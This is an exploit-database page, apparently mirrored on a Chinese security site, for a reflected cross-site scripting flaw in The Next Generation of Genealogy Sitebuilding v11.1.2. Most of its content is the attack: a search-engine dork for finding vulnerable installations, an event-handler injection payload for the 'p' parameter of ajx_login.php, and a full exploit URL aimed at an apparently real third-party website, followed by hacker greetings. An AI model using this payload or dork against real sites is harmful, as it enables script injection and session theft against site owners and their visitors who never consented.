The Next Generation of Genealogy Sitebuilding ©, v. 11.1.2 xss Vulnerability - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1215299 漏洞类型
发布时间 2018-07-08 更新时间 2018-07-08
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018070075
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
======================================================================================================================================
| # Title     : The Next Generation of Genealogy Sitebuilding ©, v. 11.1.2 xss Vulnerability                                         |
| # Author    : indoushka                                                                                                            |
| # Tested on : windows 10 Français V.(Pro)                                                                                          |
| # Vendor    : http://www.tngsitebuilding.com/                                                                                      |  
| # Dork      : This site powered by The Next Generation of Genealogy Sitebuilding ©, v. 11.1.2, written by Darrin Lythgoe 2001-2018.|
======================================================================================================================================


poc :

[+] Dorking İn Google Or Other Search Enggine 

[+] Use Payload : /ajx_login.php?p=1" onmouseover%3dprompt(/indoushka/) bad%3d"

http://www.ojocaliente.net/ajx_login.php?p=1%22%20onmouseover%3dprompt(/iindooouushhka/)%20bad%3d%22


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh     |
                                                                                                                                      |
=======================================================================================================================================